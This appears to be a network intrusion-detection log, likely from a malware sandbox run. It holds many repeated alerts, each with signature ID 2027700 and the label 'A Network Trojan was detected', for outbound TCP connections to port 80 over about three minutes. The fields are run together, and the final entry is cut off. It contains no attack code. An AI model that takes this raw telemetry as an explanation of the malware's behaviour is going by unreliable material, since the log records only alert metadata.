                            Timestamp:192.168.2.462.204.41.449871802027700 02/08/23-17:38:17.959791
                            SID:2027700
                            Source Port:49871
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450274802027700 02/08/23-17:40:05.455951
                            SID:2027700
                            Source Port:50274
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450251802027700 02/08/23-17:39:59.807891
                            SID:2027700
                            Source Port:50251
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449839802027700 02/08/23-17:38:07.247675
                            SID:2027700
                            Source Port:49839
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449960802027700 02/08/23-17:38:41.382110
                            SID:2027700
                            Source Port:49960
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449709802027700 02/08/23-17:37:27.822243
                            SID:2027700
                            Source Port:49709
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450185802027700 02/08/23-17:39:43.888646
                            SID:2027700
                            Source Port:50185
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450328802027700 02/08/23-17:40:20.835288
                            SID:2027700
                            Source Port:50328
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450055802027700 02/08/23-17:39:09.713048
                            SID:2027700
                            Source Port:50055
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450096802027700 02/08/23-17:39:19.609784
                            SID:2027700
                            Source Port:50096
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450162802027700 02/08/23-17:39:35.950587
                            SID:2027700
                            Source Port:50162
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449805802027700 02/08/23-17:37:55.775945
                            SID:2027700
                            Source Port:49805
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450073802027700 02/08/23-17:39:14.025211
                            SID:2027700
                            Source Port:50073
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450335802027700 02/08/23-17:40:22.600566
                            SID:2027700
                            Source Port:50335
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450205802027700 02/08/23-17:39:48.611499
                            SID:2027700
                            Source Port:50205
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449912802027700 02/08/23-17:38:27.898909
                            SID:2027700
                            Source Port:49912
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449823802027700 02/08/23-17:38:00.063010
                            SID:2027700
                            Source Port:49823
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449994802027700 02/08/23-17:38:54.852514
                            SID:2027700
                            Source Port:49994
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449716802027700 02/08/23-17:37:29.564268
                            SID:2027700
                            Source Port:49716
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449731802027700 02/08/23-17:37:35.554583
                            SID:2027700
                            Source Port:49731
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449734802027700 02/08/23-17:37:36.292013
                            SID:2027700
                            Source Port:49734
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450004802027700 02/08/23-17:38:57.228666
                            SID:2027700
                            Source Port:50004
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450001802027700 02/08/23-17:38:56.508014
                            SID:2027700
                            Source Port:50001
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449991802027700 02/08/23-17:38:54.132077
                            SID:2027700
                            Source Port:49991
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450261802027700 02/08/23-17:40:02.232461
                            SID:2027700
                            Source Port:50261
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450172802027700 02/08/23-17:39:38.433749
                            SID:2027700
                            Source Port:50172
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450175802027700 02/08/23-17:39:39.452531
                            SID:2027700
                            Source Port:50175
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450338802027700 02/08/23-17:40:23.333402
                            SID:2027700
                            Source Port:50338
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450264802027700 02/08/23-17:40:02.955746
                            SID:2027700
                            Source Port:50264
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450249802027700 02/08/23-17:39:59.294790
                            SID:2027700
                            Source Port:50249
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450086802027700 02/08/23-17:39:17.186333
                            SID:2027700
                            Source Port:50086
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449706802027700 02/08/23-17:37:27.103524
                            SID:2027700
                            Source Port:49706
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450322802027700 02/08/23-17:40:19.378355
                            SID:2027700
                            Source Port:50322
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449963802027700 02/08/23-17:38:45.131886
                            SID:2027700
                            Source Port:49963
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449966802027700 02/08/23-17:38:45.850942
                            SID:2027700
                            Source Port:49966
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449703802027700 02/08/23-17:37:26.386152
                            SID:2027700
                            Source Port:49703
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449877802027700 02/08/23-17:38:19.428227
                            SID:2027700
                            Source Port:49877
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449874802027700 02/08/23-17:38:18.694725
                            SID:2027700
                            Source Port:49874
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450147802027700 02/08/23-17:39:32.357168
                            SID:2027700
                            Source Port:50147
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450017802027700 02/08/23-17:39:00.402673
                            SID:2027700
                            Source Port:50017
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449788802027700 02/08/23-17:37:49.340408
                            SID:2027700
                            Source Port:49788
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449747802027700 02/08/23-17:37:39.514163
                            SID:2027700
                            Source Port:49747
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450188802027700 02/08/23-17:39:44.592465
                            SID:2027700
                            Source Port:50188
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450325802027700 02/08/23-17:40:20.110521
                            SID:2027700
                            Source Port:50325
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449699802027700 02/08/23-17:37:25.386825
                            SID:2027700
                            Source Port:49699
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450058802027700 02/08/23-17:39:10.419596
                            SID:2027700
                            Source Port:50058
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450236802027700 02/08/23-17:39:56.097184
                            SID:2027700
                            Source Port:50236
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450106802027700 02/08/23-17:39:22.067217
                            SID:2027700
                            Source Port:50106
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450277802027700 02/08/23-17:40:06.202209
                            SID:2027700
                            Source Port:50277
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449938802027700 02/08/23-17:38:35.977194
                            SID:2027700
                            Source Port:49938
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450083802027700 02/08/23-17:39:16.450190
                            SID:2027700
                            Source Port:50083
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449808802027700 02/08/23-17:37:56.496601
                            SID:2027700
                            Source Port:49808
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449719802027700 02/08/23-17:37:30.308623
                            SID:2027700
                            Source Port:49719
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450099802027700 02/08/23-17:39:20.353141
                            SID:2027700
                            Source Port:50099
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449979802027700 02/08/23-17:38:49.239264
                            SID:2027700
                            Source Port:49979
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449849802027700 02/08/23-17:38:10.042740
                            SID:2027700
                            Source Port:49849
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449820802027700 02/08/23-17:37:59.355921
                            SID:2027700
                            Source Port:49820
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449772802027700 02/08/23-17:37:45.513154
                            SID:2027700
                            Source Port:49772
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449751802027700 02/08/23-17:37:40.464030
                            SID:2027700
                            Source Port:49751
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449879802027700 02/08/23-17:38:19.911856
                            SID:2027700
                            Source Port:49879
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450051802027700 02/08/23-17:39:08.654162
                            SID:2027700
                            Source Port:50051
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450208802027700 02/08/23-17:39:49.326377
                            SID:2027700
                            Source Port:50208
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450306802027700 02/08/23-17:40:13.234357
                            SID:2027700
                            Source Port:50306
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450244802027700 02/08/23-17:39:58.067517
                            SID:2027700
                            Source Port:50244
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449723802027700 02/08/23-17:37:31.619066
                            SID:2027700
                            Source Port:49723
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449821802027700 02/08/23-17:37:59.589817
                            SID:2027700
                            Source Port:49821
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449977802027700 02/08/23-17:38:48.476008
                            SID:2027700
                            Source Port:49977
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450146802027700 02/08/23-17:39:32.113157
                            SID:2027700
                            Source Port:50146
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450048802027700 02/08/23-17:39:07.945990
                            SID:2027700
                            Source Port:50048
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450339802027700 02/08/23-17:40:23.560898
                            SID:2027700
                            Source Port:50339
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449818802027700 02/08/23-17:37:58.886130
                            SID:2027700
                            Source Port:49818
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450133802027700 02/08/23-17:39:28.968381
                            SID:2027700
                            Source Port:50133
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450257802027700 02/08/23-17:40:01.251489
                            SID:2027700
                            Source Port:50257
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450228802027700 02/08/23-17:39:54.186332
                            SID:2027700
                            Source Port:50228
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450240802027700 02/08/23-17:39:57.100034
                            SID:2027700
                            Source Port:50240
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450186802027700 02/08/23-17:39:44.122140
                            SID:2027700
                            Source Port:50186
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450050802027700 02/08/23-17:39:08.417524
                            SID:2027700
                            Source Port:50050
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449780802027700 02/08/23-17:37:47.419949
                            SID:2027700
                            Source Port:49780
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449783802027700 02/08/23-17:37:48.137742
                            SID:2027700
                            Source Port:49783
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449749802027700 02/08/23-17:37:39.995475
                            SID:2027700
                            Source Port:49749
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449936802027700 02/08/23-17:38:35.483540
                            SID:2027700
                            Source Port:49936
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449838802027700 02/08/23-17:38:06.998531
                            SID:2027700
                            Source Port:49838
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450028802027700 02/08/23-17:39:03.062795
                            SID:2027700
                            Source Port:50028
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449755802027700 02/08/23-17:37:41.418676
                            SID:2027700
                            Source Port:49755
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449853802027700 02/08/23-17:38:11.209207
                            SID:2027700
                            Source Port:49853
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450212802027700 02/08/23-17:39:50.310671
                            SID:2027700
                            Source Port:50212
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450285802027700 02/08/23-17:40:08.115127
                            SID:2027700
                            Source Port:50285
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449847802027700 02/08/23-17:38:09.522560
                            SID:2027700
                            Source Port:49847
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450120802027700 02/08/23-17:39:25.768549
                            SID:2027700
                            Source Port:50120
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450203802027700 02/08/23-17:39:48.140900
                            SID:2027700
                            Source Port:50203
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450301802027700 02/08/23-17:40:11.986986
                            SID:2027700
                            Source Port:50301
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450019802027700 02/08/23-17:39:00.869717
                            SID:2027700
                            Source Port:50019
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450031802027700 02/08/23-17:39:03.810410
                            SID:2027700
                            Source Port:50031
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450114802027700 02/08/23-17:39:23.997916
                            SID:2027700
                            Source Port:50114
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450199802027700 02/08/23-17:39:47.192794
                            SID:2027700
                            Source Port:50199
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450117802027700 02/08/23-17:39:24.763181
                            SID:2027700
                            Source Port:50117
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449819802027700 02/08/23-17:37:59.122996
                            SID:2027700
                            Source Port:49819
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449908802027700 02/08/23-17:38:26.928554
                            SID:2027700
                            Source Port:49908
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449949802027700 02/08/23-17:38:38.632550
                            SID:2027700
                            Source Port:49949
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450072802027700 02/08/23-17:39:13.789124
                            SID:2027700
                            Source Port:50072
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449825802027700 02/08/23-17:38:00.530244
                            SID:2027700
                            Source Port:49825
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449920802027700 02/08/23-17:38:29.819519
                            SID:2027700
                            Source Port:49920
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449796802027700 02/08/23-17:37:52.334940
                            SID:2027700
                            Source Port:49796
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449850802027700 02/08/23-17:38:10.307889
                            SID:2027700
                            Source Port:49850
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450231802027700 02/08/23-17:39:54.903522
                            SID:2027700
                            Source Port:50231
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449777802027700 02/08/23-17:37:46.698035
                            SID:2027700
                            Source Port:49777
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449866802027700 02/08/23-17:38:16.739355
                            SID:2027700
                            Source Port:49866
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450101802027700 02/08/23-17:39:20.831047
                            SID:2027700
                            Source Port:50101
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449736802027700 02/08/23-17:37:36.780328
                            SID:2027700
                            Source Port:49736
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449980802027700 02/08/23-17:38:49.476222
                            SID:2027700
                            Source Port:49980
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450272802027700 02/08/23-17:40:04.969177
                            SID:2027700
                            Source Port:50272
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450088802027700 02/08/23-17:39:17.657424
                            SID:2027700
                            Source Port:50088
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450314802027700 02/08/23-17:40:17.451507
                            SID:2027700
                            Source Port:50314
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450142802027700 02/08/23-17:39:31.136437
                            SID:2027700
                            Source Port:50142
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450183802027700 02/08/23-17:39:43.402506
                            SID:2027700
                            Source Port:50183
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450047802027700 02/08/23-17:39:07.710715
                            SID:2027700
                            Source Port:50047
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449760802027700 02/08/23-17:37:42.602798
                            SID:2027700
                            Source Port:49760
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450122802027700 02/08/23-17:39:26.248693
                            SID:2027700
                            Source Port:50122
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450039802027700 02/08/23-17:39:05.758232
                            SID:2027700
                            Source Port:50039
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450235802027700 02/08/23-17:39:55.857099
                            SID:2027700
                            Source Port:50235
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450278802027700 02/08/23-17:40:06.451503
                            SID:2027700
                            Source Port:50278
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450217802027700 02/08/23-17:39:51.538233
                            SID:2027700
                            Source Port:50217
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450140802027700 02/08/23-17:39:30.667124
                            SID:2027700
                            Source Port:50140
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450296802027700 02/08/23-17:40:10.763882
                            SID:2027700
                            Source Port:50296
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449910802027700 02/08/23-17:38:27.414676
                            SID:2027700
                            Source Port:49910
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449742802027700 02/08/23-17:37:38.312283
                            SID:2027700
                            Source Port:49742
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449968802027700 02/08/23-17:38:46.334914
                            SID:2027700
                            Source Port:49968
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450057802027700 02/08/23-17:39:10.183850
                            SID:2027700
                            Source Port:50057
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449732802027700 02/08/23-17:37:35.795795
                            SID:2027700
                            Source Port:49732
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449888802027700 02/08/23-17:38:22.112698
                            SID:2027700
                            Source Port:49888
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449809802027700 02/08/23-17:37:56.735328
                            SID:2027700
                            Source Port:49809
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449827802027700 02/08/23-17:38:01.010259
                            SID:2027700
                            Source Port:49827
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449883802027700 02/08/23-17:38:20.884072
                            SID:2027700
                            Source Port:49883
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449845802027700 02/08/23-17:38:08.786241
                            SID:2027700
                            Source Port:49845
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450173802027700 02/08/23-17:39:38.673124
                            SID:2027700
                            Source Port:50173
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450049802027700 02/08/23-17:39:08.183040
                            SID:2027700
                            Source Port:50049
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450150802027700 02/08/23-17:39:33.073470
                            SID:2027700
                            Source Port:50150
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449822802027700 02/08/23-17:37:59.825964
                            SID:2027700
                            Source Port:49822
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450227802027700 02/08/23-17:39:53.949663
                            SID:2027700
                            Source Port:50227
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450286802027700 02/08/23-17:40:08.361527
                            SID:2027700
                            Source Port:50286
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449770802027700 02/08/23-17:37:45.036009
                            SID:2027700
                            Source Port:49770
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450268802027700 02/08/23-17:40:03.929437
                            SID:2027700
                            Source Port:50268
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450245802027700 02/08/23-17:39:58.312452
                            SID:2027700
                            Source Port:50245
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449900802027700 02/08/23-17:38:24.979265
                            SID:2027700
                            Source Port:49900
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450104802027700 02/08/23-17:39:21.557053
                            SID:2027700
                            Source Port:50104
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449704802027700 02/08/23-17:37:26.622936
                            SID:2027700
                            Source Port:49704
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450067802027700 02/08/23-17:39:12.587874
                            SID:2027700
                            Source Port:50067
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449817802027700 02/08/23-17:37:58.632623
                            SID:2027700
                            Source Port:49817
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450263802027700 02/08/23-17:40:02.709618
                            SID:2027700
                            Source Port:50263
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450085802027700 02/08/23-17:39:16.942706
                            SID:2027700
                            Source Port:50085
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450145802027700 02/08/23-17:39:31.864006
                            SID:2027700
                            Source Port:50145
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449722802027700 02/08/23-17:37:31.299531
                            SID:2027700
                            Source Port:49722
